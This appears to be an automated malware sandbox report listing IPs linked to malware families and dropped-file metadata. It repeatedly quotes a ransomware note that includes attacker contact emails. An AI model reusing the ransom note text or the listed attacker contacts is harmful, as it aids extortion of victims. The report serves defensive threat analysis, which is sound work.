                                                                                                                                        • 108.158.75.92
                                                                                                                                        NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                        • 108.158.75.92
                                                                                                                                        https://ury.io/aVPeBaGet hashmaliciousUnknownBrowse
                                                                                                                                        • 52.222.214.74
                                                                                                                                        kiltone.topNOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        TD2HjoogPx.dllGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        MIT-GATEWAYSUShttps://d2kjcgrb1q4xt7.cloudfront.net/mULiCoBDj2Ug.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 18.66.153.159
                                                                                                                                        mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                        • 19.29.166.20
                                                                                                                                        zapret.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 18.66.161.26
                                                                                                                                        http://93287.mobiGet hashmaliciousUnknownBrowse
                                                                                                                                        • 18.165.220.52
                                                                                                                                        mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                        • 19.122.130.89
                                                                                                                                        QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                        • 18.165.220.57
                                                                                                                                        https://em.navan.com/MDM3LUlLWi04NzEAAAGXecU3IyvXka_yOfm1UXs3oOmq7mq-S6uBgGscrsY0kWMgpLalbadmEIYbTEXYqyKQHEXyRQM=Get hashmaliciousUnknownBrowse
                                                                                                                                        • 18.66.161.14
                                                                                                                                        la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                        • 18.67.71.46
                                                                                                                                        la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                        • 19.156.197.86
                                                                                                                                        2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 19.32.199.151
                                                                                                                                        TELE-ASTeleAsiaLimitedHKNOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        TD2HjoogPx.dllGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        R7bv9d6gTH.dllGet hashmaliciousUnknownBrowse
                                                                                                                                        • 103.253.43.248
                                                                                                                                        http://9089357365.com/Get hashmaliciousPhisherBrowse
                                                                                                                                        • 45.125.65.213
                                                                                                                                        UBONg7lmVR.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.66.18
                                                                                                                                        UBONg7lmVR.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.66.18
                                                                                                                                        1feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.66.18
                                                                                                                                        V6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.66.18
                                                                                                                                        V6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.66.18
                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eBrooming.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        TT copy.jsGet hashmaliciousFormBookBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        file.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYSBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        Rapporteer inbreuk op auteursrechten.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        alyemenione.lnkGet hashmaliciousHavoc, QuasarBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        Payment_Failure_Notice_Office365_sdf_[13019].htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        C:\Users\user\AppData\Local\Temp\fjeljies.cplNOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                          NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1310720
                                                                                                                                            Entropy (8bit):0.5172095868522671
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:cJhXC9lHmutpJyiRDeJ/aUKrDgnmx5Lp94:5RfLp94
                                                                                                                                            MD5:EFF5F466D470F6EF7D811DB87973972C
                                                                                                                                            SHA1:B258E7559F4D9AACE8036F857E437486DB3879E9
                                                                                                                                            SHA-256:44171B296A939BF78673275AFD068A94CB5048E84C4D50BE70660DFD86D1A567
                                                                                                                                            SHA-512:F85DAED568432AB2CC275E3C9EAD5D669ADE112C6117886A6BE7608F01934713638AEF720153C958027272D8697B6508673F644C96E9E4EC63FEA3AB43F3C4A4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x40c65229, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1310720
                                                                                                                                            Entropy (8bit):0.7217375340722815
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:DSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:DazaNvFv8V2UW/DLzN/w4wZi
                                                                                                                                            MD5:E81863A659A55BFD8EAFD7AF13ACDDC0
                                                                                                                                            SHA1:FC20A0AE07EDA9806DD5A6299749DBDD76C455F4
                                                                                                                                            SHA-256:49AD9EDF6EE2BA0EF8704B725BB61F5F04E312952BDF3EA23AFECA956FC62F73
                                                                                                                                            SHA-512:529493F19EB1339B4281BB2C18AAE37D1E5A7537B6E155E37DC6F494BA6C4DDCCDBF5B63F583BA751117213153BE921BBAC279CDABA57772C8C9514ACF117602
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:@.R)... ...............X\...;...{......................p.D..........{}..4...|..h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{.....................................u.4...|9.................M...4...|9..........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16384
                                                                                                                                            Entropy (8bit):0.0816461195700217
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:sAdYeKF2SgTT/fgsCrZClW/t5j2pZSl/l/oll+SHY/Xl+/rQLve:/z4n8Lfgs3GPltAAS4M
                                                                                                                                            MD5:6FD69ED40637A8EAAFB8FC2A08DBAABB
                                                                                                                                            SHA1:099A796984CD431A0CB24F136D152EC6B8E4F5C4
                                                                                                                                            SHA-256:C28FF6EF693587F843A37607871022BEC5325068E93EC9C20D7F31F7C2D31628
                                                                                                                                            SHA-512:AAEA1F1BC7804EBC8ECA1870EB901DDDDD8BDFC5D924AAB372E8CB7282F6D3E8D44FD679B6F158908FA84DE17B96EA2F16847E593782C13E3B60AC261B93EF3E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.N.......................................;...{...4...|9......{}..............{}......{}.vv_Q.....{}.................M...4...|9.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1265
                                                                                                                                            Entropy (8bit):7.871570440608786
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:E9cQVvXTAmwrreH2jpOofFficnwHa8LIxW9iKZCa6b8gKA9HLTdoekk4VPZ:9QF0B+nA8LIxW9iKz6bwABTh4/
                                                                                                                                            MD5:052C3E4067B84DE22814A6B3AABFB4E7
                                                                                                                                            SHA1:9D4E957897D983DBBCBFF1A3D052FD102532074C
                                                                                                                                            SHA-256:09929404ADF4A8511DCCA8FE6C850CB31F8C1DB9A94612BA590FCB660BA78648
                                                                                                                                            SHA-512:84EA54A17D1C878AE29562E415F35F5282842610FF28AA68401E520AC15064052ECDD59056555297E5893EEA28CB63823108613C144AF280CBCB72D6BC7E1C48
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:=.:....M+...G.]nB.`..ja..vo7.O(..@..m.vDT........!.,@k`..Ze.'...Y...x..3.|.b.{.q.....0....0.W.........}S.s....Q...!..CR.6.....6.SZ..|M...f..E.F..I|q.......Z...T.....!...'.t%.e.D."EL..M.+.Q.-......."n....3...Y7.S.K.R...:X%@..Vn.~.&`..V....W..'}E.k7..t.../!.c."..l.9r..9.....l+.............s....*.........:.GV..|J'.vL.xsXm.N";|^..O...bUa/Zq..r..I3N....0.>..Q..1...[.[...._....t2..{Y.<...u.w..{Y.....G.k...!(.._0....._~..<.B.fp.( +.8v...|...z..PG...o...8....P"D..s.i.....\....7.Jx./`.B...L....nHk.^..d*.U.a....X"....".......*.z.~+....w......s.y...e...<...k.....$.nOq.,...V` ..T....T..O.12nS...^.t...N.e..{...BA.86`.l ........)..........|.9?.,mG.%.h...]ni.7.....>...u].D...|.&...~...ee`..Y#1s1...b[u*.......&..J........Y.[.......T...........z..GZ...e....4.p*D.m.....Y.P/5.b|.^...RfL.^.sR.V.c._<..{2.n.M.C....D...p.S.6.....F...B.0.V.....|.h[..gL..c.Y...Q9!Z.......!.F#}3vef........w.^.......j....$..}@.k.!..]!..?D..-.Z....$OT<.......F..5$.l...ekH.K..;.tion>..w
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1265
                                                                                                                                            Entropy (8bit):7.871570440608786
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:E9cQVvXTAmwrreH2jpOofFficnwHa8LIxW9iKZCa6b8gKA9HLTdoekk4VPZ:9QF0B+nA8LIxW9iKz6bwABTh4/
                                                                                                                                            MD5:052C3E4067B84DE22814A6B3AABFB4E7
                                                                                                                                            SHA1:9D4E957897D983DBBCBFF1A3D052FD102532074C
                                                                                                                                            SHA-256:09929404ADF4A8511DCCA8FE6C850CB31F8C1DB9A94612BA590FCB660BA78648
                                                                                                                                            SHA-512:84EA54A17D1C878AE29562E415F35F5282842610FF28AA68401E520AC15064052ECDD59056555297E5893EEA28CB63823108613C144AF280CBCB72D6BC7E1C48
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:=.:....M+...G.]nB.`..ja..vo7.O(..@..m.vDT........!.,@k`..Ze.'...Y...x..3.|.b.{.q.....0....0.W.........}S.s....Q...!..CR.6.....6.SZ..|M...f..E.F..I|q.......Z...T.....!...'.t%.e.D."EL..M.+.Q.-......."n....3...Y7.S.K.R...:X%@..Vn.~.&`..V....W..'}E.k7..t.../!.c."..l.9r..9.....l+.............s....*.........:.GV..|J'.vL.xsXm.N";|^..O...bUa/Zq..r..I3N....0.>..Q..1...[.[...._....t2..{Y.<...u.w..{Y.....G.k...!(.._0....._~..<.B.fp.( +.8v...|...z..PG...o...8....P"D..s.i.....\....7.Jx./`.B...L....nHk.^..d*.U.a....X"....".......*.z.~+....w......s.y...e...<...k.....$.nOq.,...V` ..T....T..O.12nS...^.t...N.e..{...BA.86`.l ........)..........|.9?.,mG.%.h...]ni.7.....>...u].D...|.&...~...ee`..Y#1s1...b[u*.......&..J........Y.[.......T...........z..GZ...e....4.p*D.m.....Y.P/5.b|.^...RfL.^.sR.V.c._<..{2.n.M.C....D...p.S.6.....F...B.0.V.....|.h[..gL..c.Y...Q9!Z.......!.F#}3vef........w.^.......j....$..}@.k.!..]!..?D..-.Z....$OT<.......F..5$.l...ekH.K..;.tion>..w
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):292
                                                                                                                                            Entropy (8bit):7.173449817651078
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:Sdilr1Y2mcRn4KywPJMUXN8GpKziEM9xGEm6mHgXw2KQ4eOkSn:WgCgn4K1ZSGpoi59YCmAXw2KQ4eLSn
                                                                                                                                            MD5:39016D004C94E30DCE3C9C9312E7A185
                                                                                                                                            SHA1:18732C5D7790D87F2EA33E4BD6FA954927887636
                                                                                                                                            SHA-256:F641F8FB99A70691376338996DE0144C1EECD8F005FBF499EC20287CB146CCBC
                                                                                                                                            SHA-512:1DA716433D40DB992952B1AD2250A35C1404B91C9DE94F6E09E636983F4D38F1C0D40924D800CF4C4D55D69E035EF0C8D6A90128189FDA0A6D227543D6DE90B6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..5......Q.T]............0.._.V...z'y.R.SX...Y.*B.N.\.r. y.............WB.N.w....@......YU....W.k}.[.f.zLDc...*..b.K.p...9..r0.0*Kr.....[F{-.:.<.,b.m..*D..J.Z...9...aB....jw.:!..y.0..r..3..PEzC.}..z..;..BR.%..>.....8+(.X*....&.M.e.F.O4.."./)8...._....K<.D...t?.......A*?{#`\.0xABADCABA
